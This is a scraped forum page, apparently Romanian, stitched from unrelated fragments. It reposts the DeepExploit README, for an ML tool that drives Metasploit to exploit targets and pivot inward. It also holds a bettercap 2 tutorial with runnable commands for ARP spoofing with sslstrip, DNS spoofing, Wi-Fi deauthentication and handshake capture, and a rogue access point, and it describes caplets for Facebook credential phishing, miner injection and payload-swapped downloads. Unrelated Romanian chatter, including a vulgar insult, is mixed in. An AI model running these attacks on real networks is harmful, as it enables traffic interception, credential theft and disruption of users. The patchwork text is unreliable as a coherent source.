Leaderboard

Deep Exploit at Black Hat USA 2018 Arsenal. Overview DeepExploit is fully automated penetration tool linked with Metasploit. It has two exploitation modes. Intelligence mode DeepExploit identifies the status of all opened ports on the target server and executes the exploit at pinpoint using Machine Learning. Brute force mode DeepExploit executes exploits thoroughly using all combinations of "Exploit module", "Target" and "Payload" of Metasploit corresponding to user's indicated product name and port number. DeepExploit's key features are following. Self-learning. DeepExploit can learn how to exploitation by itself (uses reinforcement learning). It is not necessary for humans to prepare learning data. Efficiently execute exploit. DeepExploit can execute exploits at pinpoint (minimum 1 attempt) using self-learned data. Deep penetration. If DeepExploit succeeds the exploit to the target server, it further executes the exploit to other internal servers. Operation is very easy. Your only operation is to input one command. It is very easy!! Learning time is very fast. Generally, learning takes a lot of time. So, DeepExploit uses distributed learning by multi agents. We adopted an advanced machine learning model called A3C. Abilities of "Deep Exploit" Current DeepExploit's version is a beta. But, it can fully automatically execute following actions: Intelligence gathering. Threat modeling. Vulnerability analysis. Exploitation. Post-Exploitation. Reporting. Your benefits By using our DeepExploit, you will benefit from the following. For pentester: (a) They can greatly improve the test efficiency. (b) The more pentester uses DeepExploit, DeepExploit learns how to method of exploitation using machine learning. As a result, accuracy of test can be improve. For Information Security Officer: (c) They can quickly identify vulnerabilities of own servers. As a result, prevent that attackers attack to your servers using vulnerabilities, and protect your reputation by avoiding the negative media coverage after breach. Since attack methods to servers are evolving day by day, there is no guarantee that yesterday's security countermeasures are safety today. It is necessary to quickly find vulnerabilities and take countermeasures. Our DeepExploit will contribute greatly to keep your safety. System component DeepExploit consists of the machine learning model (A3C) and Metasploit. The A3C executes exploit to the target servers via RPC API. The A3C is developped by Keras and Tensorflow that famous ML framework based on Python. It is used to self-learn exploit's way using deep reinforcement learning. The self-learned's result is stored to learned data that reusable. Metasploit is most famous penetration test tool in the world. It is used to execute an exploit to the target servers based on instructions from the A3C. Processing flow Intelligence mode Step 1. Port scan the training servers. DeepExploit gathers information such as OS, opened port number, product name, protocol on the target server. So, it executes the port scanning to training servers. After port scanning, it executes two Metasploit's command (hosts and services) via RPC API. ex) The result of hosts command. Hosts ===== address mac name os_name os_flavor os_sp purpose info comments ------- --- ---- ------- --------- ----- ------- ---- -------- 192.168.220.145 00:0c:29:16:3a:ce Linux 2.6.X server DeepExploit gets OS type using regular expression from result of hosts command. In above example, DeepExploit gets OS type as Linux. ex) The result of services command. Services ======== host port proto info ---- ---- ----- ---- 192.168.220.145 21 tcp vsftpd 2.3.4 192.168.220.145 22 tcp OpenSSH 4.7p1 Debian 8ubuntu1 protocol 2.0 192.168.220.145 23 tcp Linux telnetd 192.168.220.145 25 tcp Postfix smtpd 192.168.220.145 53 tcp ISC BIND 9.4.2 ...snip... 192.168.220.145 5900 tcp VNC protocol 3.3 192.168.220.145 6000 tcp access denied 192.168.220.145 6667 tcp UnrealIRCd 192.168.220.145 8009 tcp Apache Jserv Protocol v1.3 192.168.220.145 8180 tcp Apache Tomcat/Coyote JSP engine 1.1 RHOSTS => 192.168.220.145 DeepExploit gets other information such as opened port numbers, protocol types, product name, product version using regular expression from result of service command. In above example, DeepExploit gets following information from the target server. Idx OS Port# Protocol product version 1 Linux 21 tcp vsftpd 2.3.4 2 Linux 22 tcp ssh 4.7p1 3 Linux 23 tcp telnet - 4 Linux 25 tcp postfix - 5 Linux 53 tcp bind 9.4.2 6 Linux 5900 tcp vnc 3.3 7 Linux 6667 tcp irc - 8 Linux 8180 tcp tomcat - Step 2. Training. DeepExploit learns how to method of exploitation using advanced machine learning model called A3C. The A3C consists of multiple neural networks. The neural networks takes the information of the training server gathered in Step1 as input and outputs some kinds of Payload. And the A3C uses the output Payload to Exploit to the training server via Metasploit. In accordance with the result (success / failure) of Exploit, the A3C updates the weight of the neural network (parameter related to attack accuracy). By performing the above processing (learning) with a combination of various inputs, an optimum Payload for input information is gradually output. In order to shorten the learning time, we execute this processing in multi threads. Therefore, learning by using various training servers, DeepExploit can execute accurate exploit according to various situations. So, DeepExploit uses training servers such as metasploitable3, metasploitable2, owaspbwa for learning. Training servers (one example) metasploitable2 metasploitable3 others Step 3. Testing. DeepExploit execute exploit to the testing server using learned result in Step2. It can execute exploits at pinpoint (minimum 1 attempt). Step 4. Post exploit. If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard. Step 5. Generate report. DeepExploit generates a report that summarizes vulnerabilities. Report's style is html. Brute force mode Step 1. Getting target products. DeepExploit receives a target product name list from the user via the console. Each product names are separated by "@" mark. ex) Target product name list. wordpress@joomla@drupal@tikiwiki Step 2. Exploit. DeepExploit takes Exploit modules, Targets, Payloads of Metasploit corresponding to the specified products and executes exploit thoroughly using all combinations of them. Step 3. Post exploit. If DeepExploit succeeds in Exploit of the testing server, it executes exploit to the internal servers with the testing server as a springboard. Step 4. Generate report. DeepExploit generates a report that summarizes vulnerabilities. Report's style is html. Installation Step.0 Git clone DeepExploit's repository. local@client:~$ git clone https://github.com/13o-bbr-bbq/machine_learning_security.git Step.1 Install required packages. local@client:~$ cd machine_learning_security/DeepExploit local@client:~$ python install -r requirements.txt Step.2 Change the setting of Keras. Keras is library of machine learning linked with Tensorflow. So, you need to edit Keras config file "keras.json" before run Deep Exploit. local@client:~$ cd "your home directory"/.keras local@client:~$ vim keras.json keras.json { "epsilon": 1e-07, "floatx": "float32", "image_data_format": "channels_last", "backend": "tensorflow" } You rewrite the element of "backend" to "tensorflow". Installation is over. Usage Step.0 Initialize Metasploit DB Common Firstly, you initialize metasploit db (postgreSQL) using msfdb command. root@kali:~# msfdb init Step.1 Launch Metasploit Framework You launch Metasploit on the remote server that installed Metasploit Framework such as Kali Linux. root@kali:~# msfconsole ______________________________________________________________________________ | | | METASPLOIT CYBER MISSILE COMMAND V4 | |______________________________________________________________________________| \\ / / \\ . / / x \\ / / \\ / + / \\ + / / * / / / . / X / / X / ### / # % # / ### . / . / . * . / * + * ^ #### __ __ __ ####### __ __ __ #### #### / \\ / \\ / \\ ########### / \\ / \\ / \\ #### ################################################################################ ################################################################################ # WAVE 4 ######## SCORE 31337 ################################## HIGH FFFFFFFF # ################################################################################ https://metasploit.com =[ metasploit v4.16.15-dev ] + -- --=[ 1699 exploits - 968 auxiliary - 299 post ] + -- --=[ 503 payloads - 40 encoders - 10 nops ] + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ] msf > Step.2 Launch RPC Server You launch RPC Server of Metasploit following. msf> load msgrpc ServerHost=192.168.220.144 ServerPort=55553 User=test Pass=test1234 [*] MSGRPC Service: 192.168.220.144:55553 [*] MSGRPC Username: test [*] MSGRPC Password: test1234 [*] Successfully loaded plugin: msgrpc msgrpc options description ServerHost IP address of your server that launched Metasploit. Above example is 192.168.220.144. ServerPort Any port number of your server that launched Metasploit. Above example is 55553. User Any user name using authentication (default => msf). Above example is test. Pass Any password using authentication (default => random string). Above example is test1234. Step.3 Edit config file. You have to change following value in config.ini ...snip... [Common] server_host : 192.168.220.144 server_port : 55553 msgrpc_user : test msgrpc_pass : test1234 ...snip... [Metasploit] lhost : 192.168.220.144 config description server_host IP address of your server that launched Metasploit. Your setting value ServerHost in Step2. server_port Any port number of your server that launched Metasploit. Your setting value ServerPort in Step2. msgrpc_user Metasploit's user name using authentication. Your setting value User in Step2. msgrpc_pass Metasploit's password using authentication. Your setting value Pass in Step2. lhost IP address of your server that launched Metasploit. Your setting value ServerHost in Step2. Intelligence mode Step.4 Train Deep Exploit You execute Deep Exploit with training mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.132 -m train command options description -t, --target IP address of training vulnerable host such as Metasploitable2. -m, --mode Execution mode "train". Demo) learning with 10 threads. Step.5 Test using trained Deep Exploit You execute Deep Exploit with testing mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.129 -m test command options description -t, --target IP address of test target host. -m, --mode Execution mode "test". Demo) testing with 1 thread. Step.6 Check scan report. Please check scan report using any web browser. local@client:~$ firefox "Deep Exploit root path"/report/DeepExploit_report.html Brute force mode Step.4 Brute force Deep Exploit You execute DeepExploit with brute force mode on the client machine. local@client:~$ python DeepExploit.py -t 192.168.184.132 -p 80 -s wordpress@joomla@drupal@tikiwiki command options description -t, --target IP address of test target host. -p, --port Indicate port number of target server. -s, --service Indicate product name of target server. Demo) Brute force mode. Coming soon!! Step.5 Check scan report Please check scan report using any web browser. Tips 1. How to change "Exploit module's option". When Deep Exploit exploits, it uses default value of Exploit module options. If you want to change option values, please input any value to "user_specify" in exploit_tree.json as following. "unix/webapp/joomla_media_upload_exec": { "targets": { "0": [ "generic/custom", "generic/shell_bind_tcp", "generic/shell_reverse_tcp", ...snip... "TARGETURI": { "type": "string", "required": true, "advanced": false, "evasion": false, "desc": "The base path to Joomla", "default": "/joomla", "user_specify": "/my_original_dir/" }, Above example is to change value of TARGETURI option in exploit module "exploit/unix/webapp/joomla_media_upload_exec" to "/my_original_dir/" from "/joomla". Operation check environment Kali Linux 2017.3 (Guest OS on VMWare) Memory: 8.0GB Metasploit Framework 4.16.15-dev Windows 10 Home 64-bit (Host OS) CPU: Intel(R) Core(TM) i7-6500U 2.50GHz Memory: 16.0GB Python 3.6.1（Anaconda3） tensorflow 1.4.0 Keras 2.1.2 msgpack 0.4.8 docopt 0.6.2 More information MBSD Blog Sorry, now Japanese only. English version is coming soon Licence Apache License 2.0 Contact us Isao Takaesu takaesu235@gmail.com https://twitter.com/bbr_bbq Source

Omul defapt creeaza iteme de CS:GO care le vinde apoi pentru a face profit pentru investit pe Forex unde face milioane pentru Off-shore-ul lui cu un BOT retea neuronala utilizand modele simple cum ar fi fibbonaci si alte metode criptografice, aceasta metoda este vanduta pe un site de dropshipping administrat de content writers de incredere. (© yoyois) Ce stim noi.. muritori de rand

bettercap 2.x: how to install and use in Kali Linux Table of contents 1. Difference between bettercap 2 and bettercap 1.6 2. How to install bettercap 2 in Kali Linux 3. Download and install the latest version of bettercap 4. bettercap usage guide 4.1 Local network monitoring 4.2 Interactive and non-interactive mode. The -eval and -caplet options. Caplets 4.3 How to run spoofing and sniffing in bettercap 4.4 Transparent HTTP proxy 4.5 DNS spoofing in bettercap 4.6 Built-in web server in bettercap 4.7 Wi-Fi networks monitoring 4.8 Capture handshakes in bettercap 4.9 Creating a fake access point 5. Review of bettercap caplets 5.1 BeEF hooking 5.2 Miner injection 5.3 Replacing the uploaded file with the payload 5.4 Stealing Facebook passwords 5.5 Collection of HTTP requests 5.6 Collection of logins and passwords with invisible forms 5.7 Redirect IPv4 DNS queries using DHCPv6 responses 5.8 Testing the http.proxy script 5.9 Passwords sniffer 5.10 Changing the prompt of the interactive bettercap session 5.11 Changing the contents of requested web pages 6. Installing bettercap from the source code in Kali Linux Conclusion Difference between bettercap 2 and bettercap 1.6 At the end of February 2018, bettercap 2 was released and since then this version is actively developing, new functions are added to it. bettercap 1.6 is deprecated and no longer supported. In the latest versions of bettercap, there are a lot of changes: the program was re-written in another programming language, instead of Ruby, using Go. Thanks to the change in language and other methods, productivity increased dramatically, optimized CPU and memory usage. The model of interaction with the program has changed: before it was a command line utility, various options were used while launching. A new version can also be run in a non-interactive mode, using options, but now an interactive mode is available, as well as an API. Even the purpose of the program has changed: it used to be a modular platform for implementing complex man-in-the-middle attacks, now, in addition to supporting man-in-the-middle attacks, there is also functionality for network monitoring, 802.11 and BLE wireless networks monitoring and attacking . The program functions became more atomized, for example, to launch the most common middle-man attack, consisting of ARP spoofing and sniffing, now you need to enter several commands (there was only one option before). This increases the flexibility of program usage, but at the same time complicates usage. To automate the work of the program and simplify the usage, ones can use caplets that control the work of bettercap and its modules. Examples of caplets are collected in the repository https://github.com/bettercap/caplets. And this is not even all the changes! It's worth mentioning that native Go plug-ins are supported (via the package.proxy module), some modules support the JavaScript scripting language for data manipulating and controlling the behavior of the program, and the program itself and its caplets support native system commands. In general, it's just another program, in which everything is new. How to install bettercap 2 in Kali Linux In the Kali Linux repositories, there is bettercap already, but at the time of writing there is an outdated 1.6.2 version. To check which version of bettercap is currently available for installation from official repositories, run: 1 apt-cache show bettercap | grep 'Version: ' If there is version 2.x, then you just need to install it: 1 sudo apt install bettercap Download and install the latest version of bettercap Remove the outdated version of bettercap if it was installed earlier: 1 2 sudo apt remove bettercap sudo rm /usr/local/bin/bettercap Fix for an already installed library: 1 ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1 Download the archive with the binary file of bettercap latest version: 1 wget "https://github.com`curl -s https://github.com/bettercap/bettercap/releases | grep -E -o '/bettercap/bettercap/releases/download/v[0-9.]+/bettercap_linux_amd64_[0-9.]+zip' | head -n 1`" We unpack, move, clean and check: 1 2 3 4 unzip bettercap_linux_amd64_*zip sudo mv bettercap /usr/local/bin/ rm README.md LICENSE.md bettercap_linux_amd64_*.zip bettercap -h Installing bettercap from the source code will be discussed at the end of the article. bettercap usage guide Now the main functional feature of bettercap is not only the man in a middle attacks. Thanks to caplets and scripts, it is possible to implement a variety of phishing attacks and attacks based on data manipulation, the starting point of which is a man-in-the-middle attack. For this reason, it's not easy to write exhaustive manual for bettercap. To approximate the possibilities of the program, read the documentation, and also get acquainted with the repository of caplets: many of them have comments in the source code that help to understand what the program will do exactly. In the following, very simple examples of starting bettercap will be considered. Let's start with using an interactive session, to do this, run bettercap: 1 sudo bettercap Local network monitoring To list the detected hosts on the local network, type: 1 net.show This is a passive method of monitoring, since the search for hosts is based on reading of the ARP cache. To exit the program, type q or press CTRL+z. And the net.probe module actively searches for hosts, sending dummy UDP packets to every possible IP in the subnet. To enable this module: 1 net.probe on We look at the detected hosts: 1 net.show This is an active method since network analyzers will see that a computer with bettercap massively sends packets. With bettercap, you can continuously monitor the network status by obtaining on-screen data in real-time, for this, run sequentially: 1 2 net.probe on ticker on The first net.probe on command, as we found out a little earlier, enable an active search for hosts, and the second command is used to execute a given set of commands periodically. Since we did not specify which commands to execute, the default executed commands are clear; net.show, the result is an interesting effect: in the background it is constantly searching for hosts, and information is displayed on the screen in real time. Interactive and non-interactive mode. The -eval and -caplet options. Caplets If you are uncomfortable to run bettercap interactively every time, you can use the -eval option, after which specify the commands that you want to run. For example, the previous example is equivalent to this: 1 sudo bettercap -eval "net.probe on; ticker on" Right in the interactive session, bettercap, you can execute the system commands. For example, the following set of commands checks if there is a connection to the WAN: 1 ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected" This same command (set of commands) can be performed right in the interactive session, just before the first command put an exclamation mark: 1 !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected" Now we will monitor local network and Internet access availability. We launch an active search for local hosts: 1 net.probe on We set the value of the ticker.commands variable, there are now three commands: two are already known bettercap internal commands (these are clear; net.show;) and one more is the set of system commands: 1 set ticker.commands 'clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected"' If desired, you can increase the period to three seconds (the default is one second): 1 set ticker.period 3 Run the task cyclically: 1 ticker on In the results of execution, pay attention to the new ‘Connected’ line: Using the -eval option, you can run this all in this way: 1 sudo bettercap -eval 'net.probe on; set ticker.commands "clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected""; set ticker.period 3; ticker on' But in addition to the -eval option, there is also the -caplet option, which also allows you to run the program with the specified commands. Let's create our first caplet. To do this, create a text file named netmon.cap (you can choose any name): 1 gedit netmon.cap And just copy all our commands to it, which we entered in the interactive session, we should get the following file: 1 2 3 4 5 net.probe on # Note the absence of quotes in this example and the quotes in the previous ones: set ticker.commands clear; net.show; !ping -c 1 google.com >/dev/null 2>&1 && echo "Connected" || echo "Not connected" set ticker.period 3 ticker on Now run bettercap with the -caplet option, after which we'll specify the path to the file with a caplet: 1 sudo bettercap -caplet ./netmon.cap How to run spoofing and sniffing in bettercap Let's start with the launch of ARP spoofing: 1 arp.spoof on By default, the attack is performed on the entire subnet, so if ARP spoofing works poorly, set the IP targets using the arp.spoof.targets variable. Its value can be one IP or several IPs separated by a comma, for example: 1 set arp.spoof.targets 192.168.0.90 To see all available host in your local network: 1 net.show Values of variables must be set before the corresponding module is run. If you need to change the value of a variable of an already running module, stop the module, set the new value and restart the module, for example: 1 2 3 arp.spoof off set arp.spoof.targets 192.168.0.90 arp.spoof on For the sniffer, if desired, you can reduce the level of verbality: 1 set net.sniff.verbose false Run the sniffer: 1 net.sniff on Transparent HTTP proxy To analyze HTTP traffic, you must enable http.proxy. If it is used in conjunction with spoofing, all HTTP traffic will be redirected to it and, if necessary, it will automatically handle port forwarding. If you want to use sslstrip, you must change the value of the http.proxy.sslstrip variable, which is set to false by default: 1 set http.proxy.sslstrip true To enable transparent HTTP proxy: 1 http.proxy on A full list of commands for attacking the local IP 192.168.0.90, as a result, continuous ARP spoofing of this address will be performed, which will cause the traffic to be redirected to the attacker's machine, to a transparent HTTP proxy, where, if possible, downgrade from HTTPS to HTTP will be performed using sslstrip, the verbality of the sniffer is lowered to show really important data: 1 2 3 4 5 6 set http.proxy.sslstrip true set net.sniff.verbose false set arp.spoof.targets 192.168.0.90 arp.spoof on http.proxy on net.sniff on To attack the whole subnet, skip the set arp.spoof.targets IP line. DNS spoofing in bettercap The DNS query is replaced by the dns.spoof module. You can configure it before starting it. By default, all domains will be spoofed, if you want to change this, then set them by the value of the dns.spoof.domains variable as comma separated list. For example, I want to spoof only two domains suip.biz and mi-al.ru, then: 1 set dns.spoof.domains suip.biz, mi-al.ru By default, DNS server send IP pointing to the interface address of the machine on which bettercap is launched. The IP address changes through the dns.spoof.address variable: 1 set dns.spoof.address desired_IP This module will only respond to requests that target the local PC; to respond to everything, set the value of the dns.spoof.all variable to true: 1 set dns.spoof.all true To run the module: 1 dns.spoof on Built-in web server in bettercap To process requests to the web server, you can use the server installed on your system, for example, Kali Linux has Apache and you just have to run it: 1 systemctl start apache2 Bettercap also has a built-in simple web server that can render HTML pages and other static files, such as JavaScript, CSS, pictures, etc. You must specify the address of the server folder by changing the value of the http.server.path variable : 1 set http.server.path /path/to/folder To start the web server (the system server, for example, Apache, should be stopped, because there may be a conflict due to the fact that different programs try to listen on the same port): 1 http.server on Wi-Fi networks monitoring This is a new bettercap feature. By the way, Bluetooth Low Energy support has also been added. To work with Wi-Fi, you need to use the -iface option, after which you can specify the name of the wireless interface: 1 sudo bettercap -iface wlan0 In the event that you will have errors raised by the previous command, for example: 1 2 Can't restore interface wlan0 wireless mode (SIOCSIWMODE failed: Bad file descriptor). Please adjust manually. Then quit bettercap and manually set the wireless interface to monitor mode. For example, as follows: 1 2 3 sudo ip link set wlan0 down sudo iw wlan0 set monitor control sudo ip link set wlan0 up Now that the wireless interface is in monitor mode, run bettercap again and enter the command: 1 wifi.recon on It starts Wi-Fi devices detection: If you want to limit to monitoring only certain channels, then execute a command like this (it sets the jumping only on the first three channels): 1 wifi.recon.channel 1,2,3 By the way, if later you need to clear the list of channels (make the program jumps on all channels), then the following command is used for this: 1 wifi.recon.channel clear To display the results, type: 1 wifi.show The next set of commands will start gathering information about Wi-Fi devices, will display a table with a full list of detected access points, as well as a list of the last 20 detections: 1 2 3 set ticker.commands 'clear; wifi.show; net.show; events.show 20' wifi.recon on ticker on Capture handshakes in bettercap Yes, bettercap now knows how to do this, and also knows how to perform the deauthentication attack. If we want to capture a handshake from a specific access point, then we need to know the channel on which it works. This is enough if we are going to passively wait for the client to connect/reconnect to the AP. To perform the deauthentication attack, we need to know the BSSID of the access point (in this case, the attack will be performed against all clients) or the BSSID of the client (in this case, the attack will be performed against one client). Let's start with the sniffer configuration. Let's make it verbal: 1 set net.sniff.verbose true Set up the filter for the handshake frames: 1 set net.sniff.filter ether proto 0x888e We set up saving the received data to the wpa.pcap file: 1 set net.sniff.output /root/wpa.pcap Run the sniffer: 1 net.sniff on The Sniffer is run the same way every time. The further values of the variables depend on the target being attacked. The target I want to attack is working on channel 8, so I set the channel: 1 wifi.recon.channel 8 Run the network analysis: 1 wifi.recon on I'm interested in AP with BSSID 50:46:5d:6e:8c:20, I can enable the filter: 1 wifi.recon 50:46:5d:6e:8c:20 The following two commands are optional, they will periodically clear the screen and display a table with the seen base stations (you can see if there are any clients at the attacked Access Points), if you do not want to, skip these commands: 1 2 set 'ticker.commands clear; wifi.show' ticker on We proceed to deauthentication. The attack can be performed in two forms: 1 wifi.deauth AP-BSSID or: 1 wifi.deauth CLIENT-BSSID In the first case, all clients will be deauthenticated, in the second case, only a specified client will be deauthenticated. I want to deauthenticate all access point clients, then my command: 1 wifi.deauth 50:46:5d:6e:8c:20 A file with captured frames can be opened for verification in Wireshark: To filter out handshakes, use the filter: 1 llc.type == 0x888e Or the filter: 1 eapol In addition to bettercap, there are already enough programs that can capture handshakes. The advantage of bettercap is that we can automate the process. For example, the following command checks the capture file and displays information about the handshake(s) if they are found there: 1 tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null A little more verbal command: 1 if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake!"; else echo "Nothing"; fi; We need the previous command to write a caplet, which will work according to the following logic: when started, launches a sniffer to capture a handshake launches deauthentication attack checks whether the handshake was captured if the handshake is captured - shutdown bettercap if the handshake is not captured, return to step 2 For this, I create a file HS_capture_50465d6e8c20.cap with the following contents: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 # Setting up the sniffer set net.sniff.verbose true set net.sniff.filter ether proto 0x888e set net.sniff.output /root/wpa.pcap net.sniff on # Configuring and starting the analysis of wireless networks; channel and BSSID replace with your values wifi.recon.channel 8 wifi.recon on sleep 20 wifi.recon 50:46:5d:6e:8c:20 # Performing the deauthentication attack, sleeping for 60 seconds, checking if a handshake was captured, # if yes, then quitting bettercap. # Note that if you changed the name of the file where the handshake is saved, you also need to change # it here - /root/wpa.pcap, and also replace BSSID with the attacked AP set ticker.commands wifi.deauth 50:46:5d:6e:8c:20; sleep 60; !'if [ "`tshark -r /root/wpa.pcap -R 'eapol' -2 2>/dev/null`" ]; then echo "Got handshake! Quit."; sleep 1; pkill -1 bettercap; else echo "Yet not captured"; fi;' # Period of the cycle - only one second is set here, because in the previous set of commands there is a sleep 60; # which sets the sleep for 60 seconds: set ticker.period 1 # Run cyclic execution of commands ticker on Running bettercap 1 sudo bettercap -iface wlan0 -caplet ./HS_capture_50465d6e8c20.cap The program will work until it grabs the handshake. But after grabbing a handshake, bettercap will finish its work and no longer bother network clients. Creating a fake access point Among the Wi-Fi functions, it is possible to create a fake access point with or without encryption. Create a fake access point "Banana" with BSSID DE:AD:BE:EF:DE:AD on channel 5 without encryption: 1 2 3 4 5 set wifi.ap.ssid Banana set wifi.ap.bssid DE:AD:BE:EF:DE:AD set wifi.ap.channel 5 set wifi.ap.encryption false wifi.recon on; wifi.ap As you can see, there is a lot of options for automation and various combined attacks, including automated attacks based on social engineering. Review of bettercap caplets As already mentioned, the caplets are placed in the official repository. There are some very simple examples that automate several typical actions, and quite complex implementations of modern attacks. BeEF hooking BeEF is a platform for web browsers exportation. To start, you need to embed the JavsScript code in a web page. The beef-passive.cap and beef-active.cap do just that. The beef-inject.js file controls the insertion, so if you want to change the address or port of the Javscript file, you need to edit this file. Before starting this attack, you need to start the BeEF service, or edit the caplets by adding the appropriate command. The first caplet insert the JavsScript file passively, the second one is active, using traffic redirection from other hosts using ARP spoofing. Miner injection crypto-miner.cap inject the miner. You need to enter your own key by editing the crypto-miner.js file. Replacing the uploaded file with the payload This module lets you intercept very specific download requests and replaces with the payload of your choice. In order for a download to get intercepted: 1. the victim's user-agent string must match the downloadautopwn.useragent.x regexp value 2. the requested file must match one of the downloadautopwn.extensions.x file extensions you can find the downloadautopwn.devices in the caplets/download-autopwn/ folder (you can add your own) The configuration is performed in download-autopwn.cap. In the pair is a download-autopwn.js file, which is NOT intended for implementation in the browser, it is used as a script for the http.proxy module (that is, it manages bettercap behavior and traffic manipulation). If someone uploaded a payload: Stealing Facebook passwords The fb-phish.cap applet shows a fake Facebook login page on port 80, interrupts login attempts using http.proxy, prints credentials, and redirects the target to a real Facebook. In the pair there is a fb-phish.js file, which is a script for the http.proxy module. You need to take care of creating a fake login page and starting the server. In this you will be helped by the Makefile file with the instructions (if you have the caplet repository downloaded, at the Bash command line execute): 1 2 cd caplets/www/ make Then in bettercap: 1 2 3 4 5 6 7 set http.server.address 0.0.0.0 set http.server.path caplets/www/www.facebook.com/ set http.proxy.script caplets/fb-phish.js http.proxy on http.server on Collection of HTTP requests Execute an ARP spoofing attack on the whole network (by default) or on a host (using -eval as described), intercept HTTP and HTTPS requests with the http.proxy and https.proxy modules and dump them using the http-req-dumsp.js proxy script. Collection of logins and passwords with invisible forms The essence of the attack is as follows: if on a web site you previously entered a login and password, then if there is a form on the page, the browser automatically fills in the data entered earlier. Firefox does this right away, Chrome requires any user interaction - for example, clicking anywhere on the web page. This form can be invisible. So, the attacker injects onto the site pages an invisible form into which the browser itself enters the login and password, the form transmits data to the attacker. This is implemented in the login-man-abuse.cap caplet. There is a demo page where you can see an example of the attack: enter any e-mail and password, then you will be transferred to another page that "guesses" what you entered earlier. Redirect IPv4 DNS queries using DHCPv6 responses Description of the attack: https://blog.fox-it.com/2018/01/11/mitm6-compromising-ipv4-networks-via-ipv6/ The approximate essence is that in modern versions of Windows, the system is set to give preference to IPv6. The attacker responds with DHCPv6 messages, provides the link-local IPv6 address and specifies the attacker's host as the DNS server. Next, DNS spoofing attack is performed. The attack is implemented in mitm6.cap. Testing the http.proxy script The proxy-script-test.cap plugin will help you test JavaScript script work. In the pair there is a proxy-script-test.js file. Passwords sniffer simple-passwords-sniffer.cap caplet is a really very simple example of data searching based on regular expression. It uses commands: 1 2 set net.sniff.regexp .*password=.+ set net.sniff.output passwords.cap Changing the prompt of the interactive bettercap session You can customize the prompt to which you enter commands. Including you can show in it useful information. An example with statistics output is contained in test-prompt-stats.cap. Changing the contents of requested web pages The web-override.cap caplet overwrites any loaded page with the one the attacker specified. The pair is the web-override.js file, this is the http.proxy module, and it describes the actions that are performed, for example, which page to display. You can write your own caplets, if you want, you can offer interesting examples to add to the repository. Installing bettercap from the source code in Kali Linux You must install the Go compiler. Open the .bashrc file in the user directory with any text editor: 1 gedit ~/.bashrc And to create new environment variables, add the following lines to this file: 1 2 3 echo 'export GOPATH=/home/git/go' >> ~/.bashrc echo 'export GOROOT=/usr/local/src/go' >> ~/.bashrc echo 'export PATH=${PATH}:$GOROOT/bin' >> ~/.bashrc When you are ready, save your changes and close the file. These changes will take effect after the reboot. Instead of restarting the computer, run: 1 source ~/.bashrc The following command automatically detects and downloads the latest version of the Go language files: 1 wget `curl -s https://golang.org/dl/ | grep -E -o 'https://[a-z0-9./]{5,}go[0-9.]{3,}linux-amd64.tar.gz' | head -n 1` Extract the downloaded archive: 1 tar zxf go*.linux-amd64.tar.gz Change the directory to $GOROOT, which we specified in ~/.bashrc. 1 sudo mv go $GOROOT Install the packages necessary for compilation: 1 sudo apt install bison byacc libpcap0.8-dev pkg-config libnetfilter-queue-dev Fix for an already installed library: 1 ln -s /usr/lib/x86_64-linux-gnu/libpcap.so.1.8.1 /usr/lib/x86_64-linux-gnu/libpcap.so.1 Download the source code, compile, install: 1 go get github.com/bettercap/bettercap To update the program: 1 go get -u github.com/bettercap/bettercap Conclusion As you can see, bettercap from a simple and fun program for man-in-the middle attacks has grown into a powerful multifunctional tool. To simplify routine activities, you can write small caps in several commands: for example, to run sniffing on a local network, or to collect information about Wi-Fi networks. Sursa: https://miloserdov.org/?p=1112

Service autorizat:

@DuTy^ da, il ajut eu. Uite ce trebuie sa faci @msttman Am uitat sa zic ca pasta veche se curata cu alcool izopropilic.

https://www.google.ro/search?client=opera&hs=mvM&ei=BzASW_ncE8jMwAL_gauQDg&q=service+it+&oq=service+it+&gs_l=psy-ab.3..0l10.7869.10543.0.10794.11.9.0.2.2.0.248.1236.0j8j1.9.0....0...1c.1.64.psy-ab..0.11.1267...0i131k1j0i67k1.0.FRhL4bRx49c Pai alege bine unde il duci sa nu il strice mai rau pe banii tai.

sa-mi saracesti coaiele, eu m-am apucat la 9 ani si deja la 15 ani eu stiam destul de ok (zic eu) programare. nu mai zi tu pe pula mea, te rezumi intr-un mod subiectiv la tine.